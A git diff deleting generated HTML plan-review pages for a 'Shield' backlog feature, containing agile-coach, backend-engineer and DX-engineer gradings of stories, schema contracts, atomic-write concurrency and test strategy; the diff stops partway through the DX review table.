-<p><strong>This is a lean PRD.</strong> It intentionally omits the following standard sections:</p>
-<ul>
-<li>Section 8 — User stories &amp; scenarios</li>
-<li>Section 9 — Functional requirements</li>
-<li>Section 10 — Non-functional requirements</li>
-<li>Section 11 — RBAC &amp; permissions matrix</li>
-<li>Section 12 — Dependencies</li>
-<li>Section 13 — Risks &amp; mitigations</li>
-<li>Section 14 — Assumptions</li>
-<li>Section 15 — Rollout plan (full — lean has its own §8 Milestones)</li>
-<li>Section 16 — Cost &amp; resource impact</li>
-<li>Section 17 — GTM &amp; customer-comms</li>
-<li>Section 18 — Support / CX impact</li>
-</ul>
-<p>If scope grows or stakeholders need more detail, run <code>/prd</code> again — Shield
-will offer to add specific sections or upgrade to <code>standard</code>.</p>
-</blockquote>
-
-</main>
-<footer class="shield-footer">Generated by Shield</footer>
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/agile-coach.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/agile-coach.html
deleted file mode 100644
index fa041797..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/agile-coach.html
+++ /dev/null
@@ -1,308 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="utf-8">
-<meta name="viewport" content="width=device-width, initial-scale=1">
-<title>Shield Plan Review</title>
-<style>
-  body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
-  h1,h2,h3{line-height:1.25;margin-top:1.6em}
-  h1{border-bottom:2px solid #e1e4e8;padding-bottom:.3em}
-  h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
-  code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em}
-  pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto}
-  pre code{background:none;padding:0}
-  table{border-collapse:collapse;width:100%;margin:1em 0}
-  th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top}
-  th{background:#f6f8fa}
-  blockquote{border-left:4px solid #d0d7de;margin:1em 0;padding:.2em 1em;color:#57606a}
-  .meta{background:#fff8e6;border:1px solid #f0d999;border-radius:8px;padding:.6em 1em;font-size:.9em;color:#6a5500}
-</style>
-</head>
-<body>
-<div class="meta">Shield Plan Review · feature <code>backlog-20260527</code> · 2026-05-27 · rendered from markdown (source of truth in <code>reviews/plan/2026-05-27/</code>)</div>
-<h1 id="agile-coach--detailed-findings">Agile Coach — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<h3 id="agile-coach-review-grade-b">Agile Coach Review (Grade: B)</h3>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Evaluation Point</th>
-<th>Grade</th>
-<th>Notes</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>AC1</td>
-<td>Story sizing</td>
-<td>A</td>
-<td>Ten stories, each a coherent single-sprint unit. Schema+validator, capture, view, remove, status badges, association+suggestion, promotion, reconciliation engine, triggers, evals, release each scoped to days not weeks. None trivial, none multi-week. EPIC-3-S2 (reconciliation engine) is the heaviest but still one focused unit.</td>
-</tr>
-<tr>
-<td>AC2</td>
-<td>Story independence</td>
-<td>B</td>
-<td>Good parallelism within M1 (S1 schema unblocks S2/S3/S4; S3 view and S4 remove can proceed in parallel once helper exists). EPIC-3-S3 hard-depends on EPIC-3-S2 (shared engine) and EPIC-3-S1 (transient reference) — correctly sequenced but tightly coupled; that coupling is inherent, not a defect.</td>
-</tr>
-<tr>
-<td>AC3</td>
-<td>Dependency ordering</td>
-<td>A</td>
-<td>Milestone chain M1→M2→M3 is explicit and acyclic. Blockers are stated: EPIC-3-S3 &quot;share the reconciliation engine&quot; depends on EPIC-3-S2; promotion (S1) precedes eager prune (S3); EPIC-2-S1 view-badges build on EPIC-1-S3 view (called out: &quot;Pipeline status badges are added in EPIC-2-S1&quot;). No circular deps.</td>
-</tr>
-<tr>
-<td>AC4</td>
-<td>Context completeness</td>
-<td>A</td>
-<td>Every story's <code>description</code> states why it exists, not just what. E.g. EPIC-1-S2 ties to a corruption-race rationale and explicitly &quot;resolves the PRD-review P1 'capture interface undefined'&quot;; EPIC-2-S1 explains the goal (&quot;show 'prd done, not yet planned' without being removed&quot;). Carried-forward PRD-review items mapped to stories.</td>
-</tr>
-<tr>
-<td>AC5</td>
-<td>Requirements clarity</td>
-<td>B</td>
-<td>Mostly specific and measurable: named validator errors (<code>unknown_kind_enum</code>, <code>missing_required_field</code>, <code>schema_version_too_new</code>), explicit field list, atomic temp-then-rename. Weaker spot: EPIC-2-S2 &quot;propose the best match&quot; leaves the matching algorithm undefined (no string-distance/heuristic spec) — deferred to a TODO LLD <code>epic-suggester</code>. AC6/AC7 partly compensate but the &quot;best match&quot; criterion is not measurable.</td>
-</tr>
-<tr>
-<td>AC6</td>
-<td>Implementation step quality</td>
-<td>B</td>
-<td>Steps say what and mostly how (e.g. &quot;write backlog.json.tmp then rename; on failure remove .tmp&quot;, &quot;pydantic + jsonschema, run via uv&quot;). Verification is largely pushed into the AC rather than into the steps themselves; e.g. EPIC-3-S2 steps describe behavior but no in-step verification checkpoint. Solid but not exemplary.</td>
-</tr>
-<tr>
-<td>AC7</td>
-<td>Acceptance criteria testability</td>
-<td>B</td>
-<td>Most AC are pass/fail verifiable by a third party (exit 0/non-zero with named error; &quot;killing capture mid-write leaves no corrupted backlog.json&quot;; &quot;second pass is a no-op&quot;). Two soft spots: EPIC-2-S2 &quot;proposes ≥1 feature and ≥1 epic candidate when matches exist&quot; — the &quot;best match&quot; quality isn't asserted; EPIC-3-S3 &quot;before the next /backlog view&quot; is a sequencing claim that's awkward to test deterministically. No vague &quot;performance is good&quot;-style criteria.</td>
-</tr>
-<tr>
-<td>AC8</td>
-<td>Sprint-readiness</td>
-<td>B</td>
-<td>M1 and M3 stories are pullable as-is. EPIC-2-S2 carries an open design question (suggestion match algorithm, TODO <code>/lld epic-suggester</code>) and PRD §9 flags &quot;Feature/epic discovery cost&quot; as still-open — a dev would need a planning conversation on the matching heuristic before estimating S2 confidently. Everything else is ready.</td>
-</tr>
-<tr>
-<td>AC9</td>
-<td>Estimation feasibility</td>
-<td>B</td>
-<td>Nine of eleven stories are confidently estimable. EPIC-2-S2 (undefined match heuristic) and EPIC-3-S2 (match-key + drift-tolerance edge space) carry estimation uncertainty until the LLDs land. All LLD design_refs are unresolved <code>TODO</code> links; that is fine for a plan, but they're the exact detail an estimator wants.</td>
-</tr>
-<tr>
-<td>AC10</td>
-<td>Definition of Done alignment</td>
-<td>B</td>
-<td>Strong on tests (dedicated EPIC-4-S1 eval story with RED→GREEN, CI wiring, self-contained no-LLM fixtures) and docs (EPIC-4-S2: command + SKILL + CHANGELOG) and release (version bump per CLAUDE.md). Not stated anywhere: code review and deploy/ship-to-staging steps in the DoD. For a plugin-asset repo &quot;staging&quot; maps loosely to the marketplace bump, but review is unmentioned.</td>
-</tr>
-<tr>
-<td>AC13</td>
-<td>Milestone coverage</td>
-<td>A</td>
-<td>All three milestones have covering stories. M1: EPIC-1-S1/S2/S3/S4 + EPIC-2-S1 (5). M2: EPIC-2-S2 (1). M3: EPIC-3-S1/S2/S3 + EPIC-4-S1/S2 (5). No empty milestone.</td>
-</tr>
-<tr>
-<td>AC14</td>
-<td>Milestone reference integrity</td>
-<td>A</td>
-<td>Every story <code>milestone_id</code> is M1, M2, or M3 — all present in <code>milestones[]</code>. No null, no dangling reference. <code>milestones[]</code> non-empty.</td>
-</tr>
-<tr>
-<td>AC15</td>
-<td>Milestone exit criteria testability</td>
-<td>B</td>
-<td>Most exit criteria are testable facts (validator exits 0/non-zero with named error; atomic temp-then-rename; &quot;a prd-only feature is NOT removed&quot;; &quot;second pass is idempotent&quot;). M2's &quot;proposes ≥1 candidate ... using a documented match&quot; leans on an undocumented match (mirrors the EPIC-2-S2 AC5/AC8 gap). M1's &quot;renders ... a research/prd/plan status read from manifest.json&quot; is verifiable. Overall testable with one soft item.</td>
-</tr>
-<tr>
-<td>AC16</td>
-<td>Milestone DAG integrity</td>
-<td>A</td>
-<td>Graph: M1→(M2), M2→(M3). Linear, acyclic, fully connected. No cycle, no dangling depends_on (M1 deps [], M2 deps [M1], M3 deps [M2]).</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Key Finding:</strong> A well-structured, sprint-ready backlog with an acyclic milestone DAG and full coverage; the single recurring weakness is the undefined feature/epic suggestion-matching heuristic (EPIC-2-S2 / M2), which is still an open question and undercuts requirements clarity, sprint-readiness, and estimability for that one story.</p>
-<h4 id="story-level-assessment">Story-Level Assessment</h4>
-<table>
-<thead>
-<tr>
-<th>Story</th>
-<th>Sizing</th>
-<th>Has Context</th>
-<th>Has Requirements</th>
-<th>Has Steps</th>
-<th>Has Criteria</th>
-<th>Sprint-Ready?</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>EPIC-1-S1 · Schema + validator</td>
-<td>OK</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-</tr>
-<tr>
-<td>EPIC-1-S2 · Capture (user+skill) atomic write</td>
-<td>OK</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-</tr>
-<tr>
-<td>EPIC-1-S3 · /backlog ordered view</td>
-<td>OK</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-</tr>
-<tr>
-<td>EPIC-1-S4 · Manual remove</td>
-<td>OK</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-</tr>
-<tr>
-<td>EPIC-2-S1 · Pipeline status from manifest</td>
-<td>OK</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-</tr>
-<tr>
-<td>EPIC-2-S2 · Feature+epic association + suggestion</td>
-<td>OK</td>
-<td>Yes</td>
-<td>Partial (match heuristic undefined)</td>
-<td>Partial</td>
-<td>Partial (&quot;best match&quot; not asserted)</td>
-<td>No</td>
-</tr>
-<tr>
-<td>EPIC-3-S1 · Promotion (transient reference)</td>
-<td>OK</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-</tr>
-<tr>
-<td>EPIC-3-S2 · Reconciliation engine</td>
-<td>OK</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-</tr>
-<tr>
-<td>EPIC-3-S3 · Eager + lazy triggers (idempotent)</td>
-<td>OK</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-</tr>
-<tr>
-<td>EPIC-4-S1 · Executable evals (RED→GREEN)</td>
-<td>OK</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-</tr>
-<tr>
-<td>EPIC-4-S2 · Version bump + docs</td>
-<td>OK</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-</tr>
-</tbody>
-</table>
-<h4 id="milestone-level-assessment">Milestone-Level Assessment</h4>
-<table>
-<thead>
-<tr>
-<th>Milestone</th>
-<th>Has Covering Stories</th>
-<th>Exit Criteria Testable</th>
-<th>Depends-On Valid</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>M1 · Capture + store + view</td>
-<td>Yes (5: E1-S1..S4, E2-S1)</td>
-<td>Yes</td>
-<td>Yes (root, deps [])</td>
-</tr>
-<tr>
-<td>M2 · Feature + epic association + suggestion</td>
-<td>Yes (1: E2-S2)</td>
-<td>Partial (&quot;documented match&quot; undefined)</td>
-<td>Yes (deps M1)</td>
-</tr>
-<tr>
-<td>M3 · Promotion + reconciliation</td>
-<td>Yes (5: E3-S1..S3, E4-S1, E4-S2)</td>
-<td>Yes</td>
-<td>Yes (deps M2)</td>
-</tr>
-</tbody>
-</table>
-<p>Note on milestone/epic phase alignment: EPIC-2-S1 carries <code>milestone_id: M1</code> while sitting in EPIC-2 (&quot;Association &amp; pipeline status&quot;). This is <strong>intentional and correct</strong>, not a conflict — the story implements the manifest status badge, which M1's outcome explicitly includes (&quot;<code>/backlog</code> renders the ordered list ... with per-entry pipeline status from manifest.json&quot;). The epic groups by theme; the milestone groups by ship-phase. They legitimately cross here. No remediation needed.</p>
-<h4 id="recommendations">Recommendations</h4>
-<table>
-<thead>
-<tr>
-<th>Priority</th>
-<th>Point</th>
-<th>Recommendation</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1</td>
-<td>AC5 / AC7 / AC8 (EPIC-2-S2)</td>
-<td>Define the feature/epic suggestion match heuristic before the story enters a sprint — specify the matching method (e.g. case-insensitive substring + token-overlap ranking on feature/epic names) and add a measurable AC such as &quot;given fixture manifest with feature <code>auth</code>, capturing text mentioning 'auth' surfaces <code>auth</code> as the top candidate.&quot; Resolve the PRD §9 open &quot;Feature/epic discovery cost&quot; question or land the TODO <code>/lld epic-suggester</code> so S2 is estimable.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>AC15 (M2)</td>
-<td>Tighten M2's exit criterion &quot;using a documented match&quot; — point it at the resolved heuristic above and restate as a testable fact, mirroring the M3 exit criteria's precision.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>AC10</td>
-<td>Add code-review and ship/staging steps to the implied Definition of Done. EPIC-4-S2 covers version bump + docs + CHANGELOG; add &quot;PR reviewed and merged; marketplace version published&quot; as an explicit DoD line so 'done' is unambiguous across the team.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>AC9</td>
-<td>The LLD <code>design_refs</code> for EPIC-1-S1, EPIC-1-S2, EPIC-2-S2, EPIC-3-S2, EPIC-3-S3 are all unresolved <code>TODO</code> links. Land (or stub) <code>/lld backlog-store</code>, <code>/lld epic-suggester</code>, and <code>/lld reconciler</code> before sprint start so estimators have the interface-level detail those stories reference.</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Overall Persona Grade: B</strong> (point average ≈ 3.43 across 14 evaluation points: six A, eight B; rounds to B). The plan is sprint-ready with strong context, an acyclic and fully-covered milestone DAG, and testable criteria throughout. The one consistent drag is the under-specified suggestion-matching in EPIC-2-S2 / M2, which a single planning clarification (P1) would lift to A-range.</p>
-
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/backend-engineer.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/backend-engineer.html
deleted file mode 100644
index 234e66d5..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/backend-engineer.html
+++ /dev/null
@@ -1,113 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="utf-8">
-<meta name="viewport" content="width=device-width, initial-scale=1">
-<title>Shield Plan Review</title>
-<style>
-  body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
-  h1,h2,h3{line-height:1.25;margin-top:1.6em}
-  h1{border-bottom:2px solid #e1e4e8;padding-bottom:.3em}
-  h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
-  code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em}
-  pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto}
-  pre code{background:none;padding:0}
-  table{border-collapse:collapse;width:100%;margin:1em 0}
-  th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top}
-  th{background:#f6f8fa}
-  blockquote{border-left:4px solid #d0d7de;margin:1em 0;padding:.2em 1em;color:#57606a}
-  .meta{background:#fff8e6;border:1px solid #f0d999;border-radius:8px;padding:.6em 1em;font-size:.9em;color:#6a5500}
-</style>
-</head>
-<body>
-<div class="meta">Shield Plan Review · feature <code>backlog-20260527</code> · 2026-05-27 · rendered from markdown (source of truth in <code>reviews/plan/2026-05-27/</code>)</div>
-<h1 id="backend-engineer--detailed-findings">Backend Engineer — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<h2 id="backend-reviewer--plan-review-shield-backlog">Backend Reviewer — Plan Review: Shield Backlog</h2>
-<p><strong>Scope:</strong> plan.md, trd.md, plan.json (4 epics / 11 stories / 3 milestones), grounded against <code>shield/schema/plan-sidecar.schema.json</code> and <code>docs/shield/manifest.json</code>.
-<strong>Stack:</strong> Python (uv), JSON-schema deliverables, command/skill markdown. No framework skills apply.</p>
-<h3 id="scorecard">Scorecard</h3>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Evaluation Point</th>
-<th>Grade</th>
-<th>Basis</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>1</td>
-<td>Data contract / schema design</td>
-<td>B</td>
-<td><code>backlog.json</code> contract is fully specified (§11, F1, EPIC-1-S1): <code>{schema_version:int, entries:[{id, order:int, kind, source, feature, epic, text}]}</code>, draft-2020-12, named errors. Gap: <code>id</code> has no type/format/uniqueness rule, and the <code>id</code> <em>generation</em> strategy is undefined (see P1-a). <code>epic</code>/<code>feature</code> typed only as bare strings with no &quot;proposed-new vs existing&quot; discriminator.</td>
-</tr>
-<tr>
-<td>2</td>
-<td>API / interface design</td>
-<td>C</td>
-<td>The skill-facing write-helper — explicitly the carried-forward PRD-review P1 — is <strong>still open</strong> (Q3: &quot;exact function signature / module location … Resolution: lock in /lld backlog-store or at EPIC-1-S2 implementation&quot;). §11 describes it only as &quot;documented function/contract taking <code>{text, kind, feature?, epic?, source}</code>; returns the created entry id.&quot; Deferring the <em>signature</em> of the one cross-skill contract to implementation time is the central interface risk (P1-b).</td>
-</tr>
-<tr>
-<td>3</td>
-<td>File I/O correctness &amp; atomicity (N1)</td>
-<td>B</td>
-<td>Strong: temp-then-rename + validate-or-refuse, crash leaves at most <code>.tmp</code> cleaned next run, git-tracked recoverability (N1, N4, EPIC-1-S2). Gaps: (a) no <code>fsync</code>/<code>os.replace</code> durability detail — &quot;rename&quot; on POSIX via <code>os.replace</code> is atomic but the plan doesn't name the primitive; (b) <strong>no concurrency primitive named</strong> — N1 claims &quot;concurrent capture racing reconciliation must never corrupt&quot; but temp-then-rename alone does not prevent <em>lost updates</em> (two writers each read-modify-rename → last-writer-wins drops an entry). No lock/CAS/re-read-under-lock mentioned (P1-c).</td>
-</tr>
-<tr>
-<td>4</td>
-<td>Error handling</td>
-<td>A</td>
-<td>Consistently specified: named validator errors (<code>unknown_kind_enum</code>, <code>missing_required_field</code>, <code>schema_version_too_new</code>), absent-id no-op, empty-backlog message, malformed-upstream → entry-stays-with-log, never-crash (N3, F5, §9). Degradation paths are explicit and testable.</td>
-</tr>
-<tr>
-<td>5</td>
-<td>Testing strategy</td>
-<td>A</td>
-<td>EPIC-4-S1 mandates self-contained executable evals (no API/LLM) under <code>shield/evals/</code>, named fixtures (prd-only-stays, plan-committed-removed, ambiguous-stays, malformed-stays), RED→GREEN in PR, CI gate. Directly satisfies CLAUDE.md eval mandate. One missing case: no eval for the <strong>lost-update concurrency</strong> path (ties to P1-c) and none for <code>schema_version_too_new</code> migration.</td>
-</tr>
-<tr>
-<td>6</td>
-<td>Framework / idiom fit</td>
-<td>A</td>
-<td>Correct for the repo: uv-run scripts, pydantic+jsonschema, schema at <code>shield/schema/</code>, skill at <code>shield/skills/general/backlog/</code>, command at <code>shield/commands/</code>, version bump in marketplace.json + pyproject (EPIC-4-S2). Matches existing <code>validate_*</code>/<code>reconcile_*</code> script conventions.</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Schema-grounding check (read-contract, N3 / §11):</strong> I verified the consumed shapes against the live files. <code>manifest.json</code> is <code>features[].{name, artifacts.{research,prd,plan_json,...}}</code> — <strong>§11 is accurate.</strong> <code>plan-sidecar.schema.json</code> has <code>epics[].{id (^EPIC-[0-9]+$), name, stories[]}</code> with <code>story.status ∈ {ready,in-progress,in-review,done,blocked}</code> — <strong>§11's <code>epics[].{id,name,stories[]}</code> is accurate.</strong> The read-contract claim is correct, which lifts N3 from a guess to a verified coupling. Good.</p>
-<hr />
-<h3 id="prioritized-recommendations">Prioritized Recommendations</h3>
-<p><strong>P1 — Important gaps (C/incomplete on important points):</strong></p>
-<ul>
-<li>
-<p><strong>P1-a · <code>id</code> contract underspecified (EvalPoint 1).</strong> F1, §11, and the schema task all list <code>id</code> as a required field but never define its type, format, or <strong>how it's generated</strong>. Manual-remove (<code>/backlog remove &lt;id&gt;</code>), promotion (<code>promote &lt;id&gt;</code>), and eager-prune all key off <code>id</code>, yet uniqueness and collision behavior are unstated. <em>Action:</em> in EPIC-1-S1, specify <code>id</code> type (string?), generation (uuid4 / monotonic / slug), and a uniqueness constraint in the schema. Add an AC: &quot;schema rejects duplicate <code>id</code>.&quot;</p>
-</li>
-<li>
-<p><strong>P1-b · The still-open write-helper signature is a P0-shaped risk parked as Q3 (EvalPoint 2).</strong> This is the <em>exact</em> PRD-review P1 the plan claims to resolve in EPIC-1-S2, but §11 + Q3 punt the signature to &quot;/lld or implementation.&quot; Since EPIC-1-S2 is the contract <em>every capturing skill builds against</em>, an unspecified signature means downstream skills can't be written or tested against a stable shape. <em>Action:</em> lock the helper signature (name, module path, params, return, raise-on-invalid behavior) in the EPIC-1-S1/S2 acceptance criteria rather than deferring it to LLD. At minimum pin: <code>capture(text, *, kind=&quot;task&quot;, feature=None, epic=None, source) -&gt; entry_id</code> and where it lives (<code>shield/scripts/backlog_store.py</code>?).</p>
-</li>
-<li>
-<p><strong>P1-c · Atomicity ≠ isolation; lost-update path unaddressed (EvalPoint 3, N1).</strong> N1's threat model is &quot;concurrent capture racing reconciliation.&quot; Temp-then-rename guarantees no <em>torn</em> file, but two concurrent read-modify-write cycles still silently drop one writer's entry (both read N entries, each writes N+1, second rename wins → one entry lost, no corruption flagged). The plan treats &quot;no corruption&quot; as equivalent to &quot;no data loss.&quot; <em>Action:</em> name the concurrency strategy — single-writer assumption documented as such, OR a lockfile / re-read-and-merge under exclusive open / <code>O_EXCL</code> temp. Add an eval fixture for two interleaved captures. If single-actor is the real assumption (N5 says &quot;single actor&quot;), state it explicitly in N1 and downgrade the &quot;racing reconciliation&quot; language, because eager-prune-at-end-of-/plan can genuinely run while an agent captures.</p>
-</li>
-</ul>
-<p><strong>P2 — Warnings / minor gaps on B items:</strong></p>
-<ul>
-<li>
-<p><strong>P2-a · &quot;Epic landed&quot; gate is ambiguous (EvalPoint 1/5, F7).</strong> F7 says remove &quot;when its epic's work appears in the feature's <code>plan.json</code>,&quot; EPIC-3-S2 AC says &quot;whose epic's <strong>stories</strong> appear,&quot; but the schema guarantees an epic always has <code>stories[] (minItems:1)</code> the moment it's written. So &quot;stories appear&quot; = &quot;epic exists&quot; — meaning an entry is pruned as soon as <code>/plan</code> <em>writes</em> the epic, regardless of whether any story is <code>done</code>. That may be intended (plan-committed = removed) but it's stated three slightly different ways. <em>Action:</em> state the gate as one precise predicate, e.g. &quot;epic with matching id/name is present in <code>plan.json.epics[]</code>&quot; — and explicitly note story <code>status</code> is <strong>not</strong> consulted. Removes reviewer ambiguity and pins the eval assertion.</p>
-</li>
-<li>
-<p><strong>P2-b · Proposed-new &quot;match by epic name&quot; fragility is acknowledged but not bounded (EvalPoint 2).</strong> Match key for proposed-new epics is <code>epic name</code> with &quot;names expected stable&quot; as an <em>unvalidated assumption</em> (PRD §10). The mitigation (§14: &quot;disable eager prune on repeated name collisions&quot;) is reactive. <em>Action:</em> add normalization rules to EPIC-3-S2 (case/whitespace-insensitive? exact?) and an AC for the collision case (&quot;two epics same normalized name → ambiguous → entry stays&quot;), which the &quot;ambiguous-stays&quot; fixture should already exercise — wire it explicitly to name-collision, not just structural ambiguity.</p>
-</li>
-<li>
-<p><strong>P2-c · <code>schema_version</code> migration is policy-only, no executable path (EvalPoint 1/5).</strong> The read-old/write-new policy is documented but EPIC-1-S1 only validates <code>schema_version_too_new</code> (reject). There's no migration <em>function</em> or eval for read-old. Acceptable for v1 (only one version exists), but the AC overstates (&quot;migration policy present&quot; = a doc, not code). <em>Action:</em> either add a no-op <code>migrate(doc)-&gt;doc</code> seam now with a test, or explicitly scope migration as doc-only-until-v2 in the AC so it isn't mistaken for working code.</p>
-</li>
-</ul>
-<hr />
-<h3 id="overall-persona-grade-b-30">Overall Persona Grade: <strong>B (3.0)</strong></h3>
-<p>Average of point grades: (B + C + B + A + A + A) = (3+2+3+4+4+4)/6 = 3.33 → <strong>B</strong>.</p>
-<p>The plan is well-grounded — the reconciliation read-contract is <em>verified accurate</em> against the live schemas (not assumed), error handling and testing strategy are A-grade, and the atomic-write framing is sound. It is held back from A by two important, named-but-unresolved interface/correctness gaps: the <strong>skill-facing write-helper signature is still open (Q3)</strong> despite being the headline PRD-review carry-forward, and <strong>N1 conflates atomicity with isolation</strong>, leaving the lost-update path under a &quot;single actor&quot; assumption that isn't stated where the threat is described. Resolve P1-b (lock the helper signature in EPIC-1-S1/S2 ACs) and P1-c (name the concurrency strategy + add the interleaved-capture eval) and this is an A.</p>
-
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/dx-engineer.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/dx-engineer.html
deleted file mode 100644
index fe94b8ff..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/dx-engineer.html
+++ /dev/null
@@ -1,172 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="utf-8">
-<meta name="viewport" content="width=device-width, initial-scale=1">
-<title>Shield Plan Review</title>
-<style>
-  body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
-  h1,h2,h3{line-height:1.25;margin-top:1.6em}
-  h1{border-bottom:2px solid #e1e4e8;padding-bottom:.3em}
-  h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
-  code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em}
-  pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto}
-  pre code{background:none;padding:0}
-  table{border-collapse:collapse;width:100%;margin:1em 0}
-  th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top}
-  th{background:#f6f8fa}
-  blockquote{border-left:4px solid #d0d7de;margin:1em 0;padding:.2em 1em;color:#57606a}
-  .meta{background:#fff8e6;border:1px solid #f0d999;border-radius:8px;padding:.6em 1em;font-size:.9em;color:#6a5500}
-</style>
-</head>
-<body>
-<div class="meta">Shield Plan Review · feature <code>backlog-20260527</code> · 2026-05-27 · rendered from markdown (source of truth in <code>reviews/plan/2026-05-27/</code>)</div>
-<h1 id="dx-engineer--detailed-findings">DX Engineer — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<h3 id="dx-engineer-review-grade-b">DX Engineer Review (Grade: B)</h3>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Evaluation Point</th>
-<th>Grade</th>
-<th>Notes</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>DX1</td>
-<td>Plan clarity</td>
-<td>A</td>
-<td>plan.md line 6 states the goal in one sentence; TRD §2 problem statement is crisp. 30-second comprehension easily met.</td>
-</tr>
-<tr>
-<td>DX2</td>
-<td>Story actionability</td>
-<td>B</td>
-<td>All 11 stories carry tasks + AC + design_refs and reference concrete files (<code>shield/schema/backlog.schema.json</code>, <code>shield/scripts/reconcile_backlog.py</code>). EPIC-1-S2 is the weak point: the skill write-helper signature is explicitly deferred (TRD §12 Q3), so a dev cannot finalize that interface without the LLD that doesn't exist yet.</td>
-</tr>
-<tr>
-<td>DX3</td>
-<td>Implementation step detail</td>
-<td>B</td>
-<td>Strong for backend tooling: names files, the validator stack (<code>pydantic + jsonschema, run via uv</code>), named error codes (<code>unknown_kind_enum</code>, <code>schema_version_too_new</code>), JSON Schema draft (2020-12). Gaps: &quot;wire into CI&quot; (EPIC-4-S1) and &quot;render a badge line&quot; give what, not how (no CI file path, no badge-format spec beyond an example).</td>
-</tr>
-<tr>
-<td>DX4</td>
-<td>Ambiguity audit</td>
-<td>B</td>
-<td>Mostly tight. Lingering vague terms: &quot;names expected stable&quot; / &quot;assumed stable&quot; (EPIC-3-S2) is an unverified assumption baked into the match key; &quot;best match&quot; (EPIC-2-S2 task) and &quot;the candidate plan.json&quot; (plan.md L56) are undefined — no matching algorithm or tie-break rule is specified.</td>
-</tr>
-<tr>
-<td>DX5</td>
-<td>Context sufficiency</td>
-<td>A</td>
-<td>TRD §11 documents the consumed read-contract, §8 records 4 rejected alternatives with rationale, §13 links prior art, PRD §2 is a glossary. A new dev has the background to start. Verified against repo: referenced shapes and dirs exist.</td>
-</tr>
-<tr>
-<td>DX6</td>
-<td>Dependency clarity</td>
-<td>B</td>
-<td>Milestone deps are explicit (M1→M2→M3) and stories carry milestone_id. Gap: no story-level dependency graph — e.g. EPIC-3-S3 (triggers) clearly depends on EPIC-3-S2 (engine) and EPIC-3-S1 (transient reference), but that ordering is implied, not stated. EPIC-2-S1 is tagged M1 while sitting in EPIC-2 (M2), which is correct but easy to miss without an explicit note.</td>
-</tr>
-<tr>
-<td>DX7</td>
-<td>Tool &amp; access requirements</td>
